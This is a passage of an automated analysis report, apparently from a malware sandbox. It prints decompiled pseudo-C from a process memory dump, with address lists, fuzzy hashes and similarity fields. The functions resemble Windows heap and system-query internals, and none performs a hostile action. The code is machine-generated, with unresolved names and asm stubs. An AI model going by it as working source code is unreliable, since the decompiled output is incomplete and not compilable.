                        				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                        				E02BDFA60( &_v156, 0, _t87);
                        				_t13 = _t77 + 0x30; // 0x3db8
                        				_t85 =  &_v156;
                        				_v36 =  *_t13;
                        				_v28 = _v168;
                        				_v32 = 0;
                        				_v24 = 0;
                        				_v20 = _v158;
                        				_v160 = 0;
                        				while(1) {
                        					_push( &_v164);
                        					_push(_t87);
                        					_push(_t85);
                        					_push(0x18);
                        					_push( &_v36);
                        					_push(0x1e);
                        					_t88 = E02BDB0B0();
                        					if(_t88 != 0xc0000023) {
                        						break;
                        					}
                        					if(_t85 !=  &_v156) {
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                        					}
                        					_t84 = L02BB4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                        					_v168 = _v164;
                        					if(_t84 == 0) {
                        						_t88 = 0xc0000017;
                        						goto L19;
                        					} else {
                        						_t74 = _v160 + 1;
                        						_v160 = _t74;
                        						if(_t74 >= 0x10) {
                        							L19:
                        							_t86 = E02B9CCC0(_t88);
                        							if(_t86 != 0) {
                        								L8:
                        								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                        								_t30 = _t77 + 0x24; // 0x2c88504
                        								E02BAFFB0(_t77, _t84, _t30);
                        								if(_t84 != 0 && _t84 !=  &_v156) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                        								}
                        								if(_t86 != 0) {
                        									goto L12;
                        								} else {
                        									goto L11;
                        								}
                        							}
                        							L6:
                        							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                        							if(_v164 != 0) {
                        								_t83 = _t84;
                        								E02BC4F49(_t77, _t84);
                        							}
                        							goto L8;
                        						}
                        						_t87 = _v168;
                        						continue;
                        					}
                        				}
                        				if(_t88 != 0) {
                        					goto L19;
                        				}
                        				goto L6;
                        			}


























                        0x02bc4bad
                        0x02bc4bbf
                        0x02bc4bc2
                        0x02bc4bc6
                        0x02bc4bcd
                        0x02bc4bd9
                        0x02c067fe
                        0x02c06800
                        0x02bc4ccc
                        0x02bc4ccd
                        0x02bc4cb7
                        0x02bc4cc9
                        0x02bc4cc9
                        0x02bc4bdf
                        0x02bc4be5
                        0x00000000
                        0x00000000
                        0x02bc4beb
                        0x02bc4bef
                        0x00000000
                        0x00000000
                        0x02bc4bf5
                        0x02bc4bf9
                        0x02bc4c06
                        0x02bc4c0b
                        0x02bc4c17
                        0x02bc4c1c
                        0x02bc4c1f
                        0x02bc4c25
                        0x02bc4c33
                        0x02bc4c3d
                        0x02bc4c40
                        0x02bc4c43
                        0x02bc4c47
                        0x02bc4c4d
                        0x02bc4c53
                        0x02bc4c54
                        0x02bc4c55
                        0x02bc4c56
                        0x02bc4c5b
                        0x02bc4c5c
                        0x02bc4c63
                        0x02bc4c6b
                        0x00000000
                        0x00000000
                        0x02c06776
                        0x02c06784
                        0x02c06784
                        0x02c0679f
                        0x02c067a7
                        0x02c067af
                        0x02c067ce
                        0x00000000
                        0x02c067b1
                        0x02c067b7
                        0x02c067b8
                        0x02c067c1
                        0x02c067d3
                        0x02c067d9
                        0x02c067dd
                        0x02bc4c94
                        0x02bc4c94
                        0x02bc4c98
                        0x02bc4c9c
                        0x02bc4ca3
                        0x02c067f4
                        0x02c067f4
                        0x02bc4cb5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bc4cb5
                        0x02bc4c79
                        0x02bc4c7e
                        0x02bc4c89
                        0x02bc4c8b
                        0x02bc4c8f
                        0x02bc4c8f
                        0x00000000
                        0x02bc4c89
                        0x02c067c3
                        0x00000000
                        0x02c067c3
                        0x02c067af
                        0x02bc4c73
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4d2810d63b05138e5cd7a4c7513e9483de4090a7c03fc1962e483998614df4c
                        • Instruction ID: fd0c286edc3afe87727fec8badd5a62a5b6f4de508545f3c15eada6dff09bec7
                        • Opcode Fuzzy Hash: f4d2810d63b05138e5cd7a4c7513e9483de4090a7c03fc1962e483998614df4c
                        • Instruction Fuzzy Hash: 82419435A402289BCB21DF68C980FEA77B9EF45710F1104E9E908AB251DB74EF84CF95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02BC4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				char _v176;
                        				char _v177;
                        				char _v184;
                        				intOrPtr _v192;
                        				intOrPtr _v196;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed short _t42;
                        				char* _t44;
                        				intOrPtr _t46;
                        				intOrPtr _t50;
                        				char* _t57;
                        				intOrPtr _t59;
                        				intOrPtr _t67;
                        				signed int _t69;
                        
                        				_t64 = __edx;
                        				_v12 =  *0x2c8d360 ^ _t69;
                        				_t65 = 0xa0;
                        				_v196 = __edx;
                        				_v177 = 0;
                        				_t67 = __ecx;
                        				_v192 = __ecx;
                        				E02BDFA60( &_v176, 0, 0xa0);
                        				_t57 =  &_v176;
                        				_t59 = 0xa0;
                        				if( *0x2c87bc8 != 0) {
                        					L3:
                        					while(1) {
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						_t67 = _v192;
                        						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                        						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                        						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                        						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                        						_push( &_v184);
                        						_push(_t59);
                        						_push(_t57);
                        						_push(0xa0);
                        						_push(_t57);
                        						_push(0xf);
                        						_t42 = E02BDB0B0();
                        						if(_t42 != 0xc0000023) {
                        							break;
                        						}
                        						if(_v177 != 0) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                        						}
                        						_v177 = 1;
                        						_t44 = L02BB4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                        						_t59 = _v184;
                        						_t57 = _t44;
                        						if(_t57 != 0) {
                        							continue;
                        						} else {
                        							_t42 = 0xc0000017;
                        							break;
                        						}
                        					}
                        					if(_t42 != 0) {
                        						_t65 = E02B9CCC0(_t42);
                        						if(_t65 != 0) {
                        							L10:
                        							if(_v177 != 0) {
                        								if(_t57 != 0) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                        								}
                        							}
                        							_t46 = _t65;
                        							L12:
                        							return E02BDB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                        						}
                        						L7:
                        						_t50 = _a4;
                        						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                        						if(_t50 != 3) {
                        							if(_t50 == 2) {
                        								goto L8;
                        							}
                        							L9:
                        							if(E02BDF380(_t67 + 0xc, 0x2b75138, 0x10) == 0) {
                        								 *0x2c860d8 = _t67;
                        							}
                        							goto L10;
                        						}
                        						L8:
                        						_t64 = _t57 + 0x28;
                        						E02BC4F49(_t67, _t57 + 0x28);
                        						goto L9;
                        					}
                        					_t65 = 0;
                        					goto L7;
                        				}
                        				if(E02BC4E70(0x2c886b0, 0x2bc5690, 0, 0) != 0) {
                        					_t46 = E02B9CCC0(_t56);
                        					goto L12;
                        				} else {
                        					_t59 = 0xa0;
                        					goto L3;
                        				}
                        			}




















                        0x02bc4d3b
                        0x02bc4d4d
                        0x02bc4d53
                        0x02bc4d58
                        0x02bc4d65
                        0x02bc4d6c
                        0x02bc4d71
                        0x02bc4d77
                        0x02bc4d7f
                        0x02bc4d8c
                        0x02bc4d8e
                        0x02bc4dad
                        0x02bc4db0
                        0x02bc4db7
                        0x02bc4db8
                        0x02bc4db9
                        0x02bc4dba
                        0x02bc4dbb
                        0x02bc4dc1
                        0x02bc4dc8
                        0x02bc4dcc
                        0x02bc4dd5
                        0x02bc4dde
                        0x02bc4ddf
                        0x02bc4de0
                        0x02bc4de1
                        0x02bc4de6
                        0x02bc4de7
                        0x02bc4de9
                        0x02bc4df3
                        0x00000000
                        0x00000000
                        0x02c06c7c
                        0x02c06c8a
                        0x02c06c8a
                        0x02c06c9d
                        0x02c06ca7
                        0x02c06cac
                        0x02c06cb2
                        0x02c06cb9
                        0x00000000
                        0x02c06cbf
                        0x02c06cbf
                        0x00000000
                        0x02c06cbf
                        0x02c06cb9
                        0x02bc4dfb
                        0x02c06ccf
                        0x02c06cd3
                        0x02bc4e32
                        0x02bc4e39
                        0x02c06ce0
                        0x02c06cf2
                        0x02c06cf2
                        0x02c06ce0
                        0x02bc4e3f
                        0x02bc4e41
                        0x02bc4e51
                        0x02bc4e51
                        0x02bc4e03
                        0x02bc4e03
                        0x02bc4e09
                        0x02bc4e0f
                        0x02bc4e57
                        0x00000000
                        0x00000000
                        0x02bc4e1b
                        0x02bc4e30
                        0x02bc4e5b
                        0x02bc4e5b
                        0x00000000
                        0x02bc4e30
                        0x02bc4e11
                        0x02bc4e11
                        0x02bc4e16
                        0x00000000
                        0x02bc4e16
                        0x02bc4e01
                        0x00000000
                        0x02bc4e01
                        0x02bc4da5
                        0x02c06c6b
                        0x00000000
                        0x02bc4dab
                        0x02bc4dab
                        0x00000000
                        0x02bc4dab

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a66c7c5a9f36230ea37ac0e8e38c0dc93b17026b779de51d699fb444dfa7d0c0
                        • Instruction ID: 6f959af89e147f9cf30ebb9f90e2abd7b2b4c4a14139c683bd5870d7571de67f
                        • Opcode Fuzzy Hash: a66c7c5a9f36230ea37ac0e8e38c0dc93b17026b779de51d699fb444dfa7d0c0
                        • Instruction Fuzzy Hash: EB41B2B1A403189FEB25DF14CC90FABB7BAEB45714F2140E9E8459B281D770DE44CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E02BA8A0A(intOrPtr* __ecx, signed int __edx) {
                        				signed int _v8;
                        				char _v524;
                        				signed int _v528;
                        				void* _v532;
                        				char _v536;
                        				char _v540;
                        				char _v544;
                        				intOrPtr* _v548;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t44;
                        				void* _t46;
                        				void* _t48;
                        				signed int _t53;
                        				signed int _t55;
                        				intOrPtr* _t62;
                        				void* _t63;
                        				unsigned int _t75;
                        				signed int _t79;
                        				unsigned int _t81;
                        				unsigned int _t83;
                        				signed int _t84;
                        				void* _t87;
                        
                        				_t76 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t84;
                        				_v536 = 0x200;
                        				_t79 = 0;
                        				_v548 = __edx;
                        				_v544 = 0;
                        				_t62 = __ecx;
                        				_v540 = 0;
                        				_v532 =  &_v524;
                        				if(__edx == 0 || __ecx == 0) {
                        					L6:
                        					return E02BDB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                        				} else {
                        					_v528 = 0;
                        					E02BAE9C0(1, __ecx, 0, 0,  &_v528);
                        					_t44 = _v528;
                        					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                        					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                        					_t46 = 0xa;
                        					_t87 = _t81 - _t46;
                        					if(_t87 > 0 || _t87 == 0) {
                        						 *_v548 = 0x2b71180;
                        						L5:
                        						_t79 = 1;
                        						goto L6;
                        					} else {
                        						_t48 = E02BC1DB5(_t62,  &_v532,  &_v536);
                        						_t76 = _v528;
                        						if(_t48 == 0) {
                        							L9:
                        							E02BD3C2A(_t81, _t76,  &_v544);
                        							 *_v548 = _v544;
                        							goto L5;
                        						}
                        						_t62 = _v532;
                        						if(_t62 != 0) {
                        							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                        							_t53 =  *_t62;
                        							_v528 = _t53;
                        							if(_t53 != 0) {
                        								_t63 = _t62 + 4;
                        								_t55 = _v528;
                        								do {
                        									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                        										if(E02BA8999(_t63,  &_v540) == 0) {
                        											_t55 = _v528;
                        										} else {
                        											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                        											_t55 = _v528;
                        											if(_t75 >= _t83) {
                        												_t83 = _t75;
                        											}
                        										}
                        									}
                        									_t63 = _t63 + 0x14;
                        									_t55 = _t55 - 1;
                        									_v528 = _t55;
                        								} while (_t55 != 0);
                        								_t62 = _v532;
                        							}
                        							if(_t62 !=  &_v524) {
                        								L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                        							}
                        							_t76 = _t83 & 0x0000ffff;
                        							_t81 = _t83 >> 0x10;
                        						}
                        						goto L9;
                        					}
                        				}
                        			}



























                        0x02ba8a0a
                        0x02ba8a1c
                        0x02ba8a23
                        0x02ba8a2e
                        0x02ba8a30
                        0x02ba8a36
                        0x02ba8a3c
                        0x02ba8a3e
                        0x02ba8a4a
                        0x02ba8a52
                        0x02ba8a9c
                        0x02ba8aae
                        0x02ba8a58
                        0x02ba8a5e
                        0x02ba8a6a
                        0x02ba8a6f
                        0x02ba8a75
                        0x02ba8a7d
                        0x02ba8a85
                        0x02ba8a86
                        0x02ba8a89
                        0x02ba8a93
                        0x02ba8a99
                        0x02ba8a9b
                        0x00000000
                        0x02ba8aaf
                        0x02ba8abe
                        0x02ba8ac3
                        0x02ba8acb
                        0x02ba8ad7
                        0x02ba8ae0
                        0x02ba8af1
                        0x00000000
                        0x02ba8af1
                        0x02ba8acd
                        0x02ba8ad5
                        0x02ba8afb
                        0x02ba8afd
                        0x02ba8aff
                        0x02ba8b07
                        0x02ba8b22
                        0x02ba8b24
                        0x02ba8b2a
                        0x02ba8b2e
                        0x02ba8b3f
                        0x02ba8b78
                        0x02ba8b41
                        0x02ba8b52
                        0x02ba8b54
                        0x02ba8b5c
                        0x02ba8b74
                        0x02ba8b74
                        0x02ba8b5c
                        0x02ba8b3f
                        0x02ba8b5e
                        0x02ba8b61
                        0x02ba8b64
                        0x02ba8b64
                        0x02ba8b6c
                        0x02ba8b6c
                        0x02ba8b11
                        0x02bf9cd5
                        0x02bf9cd5
                        0x02ba8b17
                        0x02ba8b1a
                        0x02ba8b1a
                        0x00000000
                        0x02ba8ad5
                        0x02ba8a89

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2fbcb539d5a4638c4a727d0401c8681b446f7a6167b215581d7444758e43e93d
                        • Instruction ID: fdac9af5cb0db7f2cbb9d5e83908b0af781499a443dbb8551469706df0a1691b
                        • Opcode Fuzzy Hash: 2fbcb539d5a4638c4a727d0401c8681b446f7a6167b215581d7444758e43e93d
                        • Instruction Fuzzy Hash: 1D4180B1A0522C9BDB24DF19CC98BA9B3F5FB44300F5045EAD91997641E7719E80CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02C5AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                        				intOrPtr _v8;
                        				char _v12;
                        				signed int _v16;
                        				signed char _v20;
                        				intOrPtr _v24;
                        				char* _t37;
                        				void* _t47;
                        				signed char _t51;
                        				void* _t53;
                        				char _t55;
                        				intOrPtr _t57;
                        				signed char _t61;
                        				intOrPtr _t75;
                        				void* _t76;
                        				signed int _t81;
                        				intOrPtr _t82;
                        
                        				_t53 = __ecx;
                        				_t55 = 0;
                        				_v20 = _v20 & 0;
                        				_t75 = __edx;
                        				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                        				_v24 = __edx;
                        				_v12 = 0;
                        				if((_t81 & 0x01000000) != 0) {
                        					L5:
                        					if(_a8 != 0) {
                        						_t81 = _t81 | 0x00000008;
                        					}
                        					_t57 = E02C5ABF4(_t55 + _t75, _t81);
                        					_v8 = _t57;
                        					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                        						_t76 = 0;
                        						_v16 = _v16 & 0;
                        					} else {
                        						_t59 = _t53;
                        						_t76 = E02C5AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                        						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                        							_t47 = E02C5AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                        							_t61 = _v20;
                        							if(_t61 != 0) {
                        								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                        								if(E02C3CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                        									L02BB77F0(_t53, 0, _t76);
                        									_t76 = 0;
                        								}
                        							}
                        						}
                        					}
                        					_t82 = _v8;
                        					L16:
                        					if(E02BB7D50() == 0) {
                        						_t37 = 0x7ffe0380;
                        					} else {
                        						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						E02C5131B(_t53, _t76, _t82, _v16);
                        					}
                        					return _t76;
                        				}
                        				_t51 =  *(__ecx + 0x20);
                        				_v20 = _t51;
                        				if(_t51 == 0) {
                        					goto L5;
                        				}
                        				_t81 = _t81 | 0x00000008;
                        				if(E02C3CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                        					_t55 = _v12;
                        					goto L5;
                        				} else {
                        					_t82 = 0;
                        					_t76 = 0;
                        					_v16 = _v16 & 0;
                        					goto L16;
                        				}
                        			}



















                        0x02c5aa1f
                        0x02c5aa21
                        0x02c5aa23
                        0x02c5aa2b
                        0x02c5aa30
                        0x02c5aa36
                        0x02c5aa39
                        0x02c5aa42
                        0x02c5aa75
                        0x02c5aa7a
                        0x02c5aa7c
                        0x02c5aa7c
                        0x02c5aa88
                        0x02c5aa8a
                        0x02c5aa8f
                        0x02c5ab02
                        0x02c5ab04
                        0x02c5aa99
                        0x02c5aaa8
                        0x02c5aaaf
                        0x02c5aab3
                        0x02c5aacc
                        0x02c5aad1
                        0x02c5aad6
                        0x02c5aae0
                        0x02c5aaf3
                        0x02c5aaf9
                        0x02c5aafe
                        0x02c5aafe
                        0x02c5aaf3
                        0x02c5aad6
                        0x02c5aab3
                        0x02c5ab07
                        0x02c5ab0a
                        0x02c5ab11
                        0x02c5ab23
                        0x02c5ab13
                        0x02c5ab1c
                        0x02c5ab1c
                        0x02c5ab2b
                        0x02c5ab44
                        0x02c5ab44
                        0x02c5ab51
                        0x02c5ab51
                        0x02c5aa44
                        0x02c5aa47
                        0x02c5aa4c
                        0x00000000
                        0x00000000
                        0x02c5aa5a
                        0x02c5aa64
                        0x02c5aa72
                        0x00000000
                        0x02c5aa66
                        0x02c5aa66
                        0x02c5aa68
                        0x02c5aa6a
                        0x00000000
                        0x02c5aa6a

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction ID: 9cf398830fa64a204a649b69b9b19d1ba4a9f67ad72d327ff16a8061132b89b4
                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction Fuzzy Hash: E031C232B009646BDB158B67C845BAFF7ABEFC4314F054169EC05A7291DB74DE80CA98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02C5FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                        				char _v8;
                        				signed int _v12;
                        				signed int _t29;
                        				char* _t32;
                        				char* _t43;
                        				signed int _t80;
                        				signed int* _t84;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t56 = __edx;
                        				_t84 = __ecx;
                        				_t80 = E02C5FD4E(__ecx, __edx);
                        				_v12 = _t80;
                        				if(_t80 != 0) {
                        					_t29 =  *__ecx & _t80;
                        					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                        					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                        						E02C60A13(__ecx, _t80, 0, _a4);
                        						_t80 = 1;
                        						if(E02BB7D50() == 0) {
                        							_t32 = 0x7ffe0380;
                        						} else {
                        							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        						}
                        						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        							_push(3);
                        							L21:
                        							E02C51608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                        						}
                        						goto L22;
                        					}
                        					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                        						_t80 = E02C62B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                        						if(_t80 != 0) {
                        							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                        							_t77 = _v8;
                        							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                        								E02C5C8F7(_t66, _t77, 0);
                        							}
                        						}
                        					} else {
                        						_t80 = E02C5DBD2(__ecx[0xb], _t74, __edx, _a4);
                        					}
                        					if(E02BB7D50() == 0) {
                        						_t43 = 0x7ffe0380;
                        					} else {
                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                        						goto L22;
                        					} else {
                        						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                        						goto L21;
                        					}
                        				} else {
                        					_push(__ecx);
                        					_push(_t80);
                        					E02C5A80D(__ecx[0xf], 9, __edx, _t80);
                        					L22:
                        					return _t80;
                        				}
                        			}










                        0x02c5fde7
                        0x02c5fde8
                        0x02c5fdec
                        0x02c5fdee
                        0x02c5fdf5
                        0x02c5fdf7
                        0x02c5fdfc
                        0x02c5fe19
                        0x02c5fe22
                        0x02c5fe26
                        0x02c5fec6
                        0x02c5fecd
                        0x02c5fed5
                        0x02c5fee7
                        0x02c5fed7
                        0x02c5fee0
                        0x02c5fee0
                        0x02c5feef
                        0x02c5ff00
                        0x02c5ff02
                        0x02c5ff07
                        0x02c5ff07
                        0x00000000
                        0x02c5feef
                        0x02c5fe33
                        0x02c5fe55
                        0x02c5fe59
                        0x02c5fe5b
                        0x02c5fe5e
                        0x02c5fe69
                        0x02c5fe6d
                        0x02c5fe6d
                        0x02c5fe69
                        0x02c5fe35
                        0x02c5fe41
                        0x02c5fe41
                        0x02c5fe79
                        0x02c5fe8b
                        0x02c5fe7b
                        0x02c5fe84
                        0x02c5fe84
                        0x02c5fe93
                        0x00000000
                        0x02c5fea8
                        0x02c5feba
                        0x00000000
                        0x02c5feba
                        0x02c5fdfe
                        0x02c5fe01
                        0x02c5fe02
                        0x02c5fe08
                        0x02c5ff0c
                        0x02c5ff14
                        0x02c5ff14

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction ID: 8e894d7a097bb7618f2e7af07f248c55f845809dcce03b51df226704409204aa
                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction Fuzzy Hash: CA312A323006906FD32A9B69C844F6AB7EAEFC6344F18455CEC4A8BB41DBB5DD81C718
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E02C5EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                        				signed int _v8;
                        				char _v12;
                        				intOrPtr _v15;
                        				char _v16;
                        				intOrPtr _v19;
                        				void* _v28;
                        				intOrPtr _v36;
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t26;
                        				signed int _t27;
                        				char* _t40;
                        				unsigned int* _t50;
                        				intOrPtr* _t58;
                        				unsigned int _t59;
                        				char _t75;
                        				signed int _t86;
                        				intOrPtr _t88;
                        				intOrPtr* _t91;
                        
                        				_t75 = __edx;
                        				_t91 = __ecx;
                        				_v12 = __edx;
                        				_t50 = __ecx + 0x30;
                        				_t86 = _a4 & 0x00000001;
                        				if(_t86 == 0) {
                        					E02BB2280(_t26, _t50);
                        					_t75 = _v16;
                        				}
                        				_t58 = _t91;
                        				_t27 = E02C5E815(_t58, _t75);
                        				_v8 = _t27;
                        				if(_t27 != 0) {
                        					E02B9F900(_t91 + 0x34, _t27);
                        					if(_t86 == 0) {
                        						E02BAFFB0(_t50, _t86, _t50);
                        					}
                        					_push( *((intOrPtr*)(_t91 + 4)));
                        					_push( *_t91);
                        					_t59 =  *(_v8 + 0x10);
                        					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                        					_push(0x8000);
                        					_t11 = _t53 - 1; // 0x0
                        					_t12 = _t53 - 1; // 0x0
                        					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                        					E02C5AFDE( &_v12,  &_v16);
                        					asm("lock xadd [eax], ecx");
                        					asm("lock xadd [eax], ecx");
                        					E02C5BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                        					_t55 = _v36;
                        					_t88 = _v36;
                        					if(E02BB7D50() == 0) {
                        						_t40 = 0x7ffe0388;
                        					} else {
                        						_t55 = _v19;
                        						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        					}
                        					if( *_t40 != 0) {
                        						E02C4FE3F(_t55, _t91, _v15, _t55);
                        					}
                        				} else {
                        					if(_t86 == 0) {
                        						E02BAFFB0(_t50, _t86, _t50);
                        						_t75 = _v16;
                        					}
                        					_push(_t58);
                        					_t88 = 0;
                        					_push(0);
                        					E02C5A80D(_t91, 8, _t75, 0);
                        				}
                        				return _t88;
                        			}






















                        0x02c5ea55
                        0x02c5ea66
                        0x02c5ea68
                        0x02c5ea6c
                        0x02c5ea6f
                        0x02c5ea72
                        0x02c5ea75
                        0x02c5ea7a
                        0x02c5ea7a
                        0x02c5ea7e
                        0x02c5ea80
                        0x02c5ea85
                        0x02c5ea8b
                        0x02c5eab5
                        0x02c5eabc
                        0x02c5eabf
                        0x02c5eabf
                        0x02c5eaca
                        0x02c5eace
                        0x02c5ead0
                        0x02c5eae4
                        0x02c5eaeb
                        0x02c5eaf0
                        0x02c5eaf5
                        0x02c5eb09
                        0x02c5eb0d
                        0x02c5eb1d
                        0x02c5eb2d
                        0x02c5eb38
                        0x02c5eb3d
                        0x02c5eb41
                        0x02c5eb4a
                        0x02c5eb60
                        0x02c5eb4c
                        0x02c5eb52
                        0x02c5eb59
                        0x02c5eb59
                        0x02c5eb68
                        0x02c5eb71
                        0x02c5eb71
                        0x02c5ea8d
                        0x02c5ea8f
                        0x02c5ea92
                        0x02c5ea97
                        0x02c5ea97
                        0x02c5ea9b
                        0x02c5ea9c
                        0x02c5ea9e
                        0x02c5eaa6
                        0x02c5eaa6
                        0x02c5eb7e

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction ID: ffa3a6128b85fb4755c344f9a52776ccd5191f7820c88e1a264398415d0e5693
                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction Fuzzy Hash: 4131B0726047159BC719DF25C880A6BB7AAFFC0350F048A2DF99687640DF31EA05CBA9
                        Uniqueness

                        Uniqueness Score: -1.00%

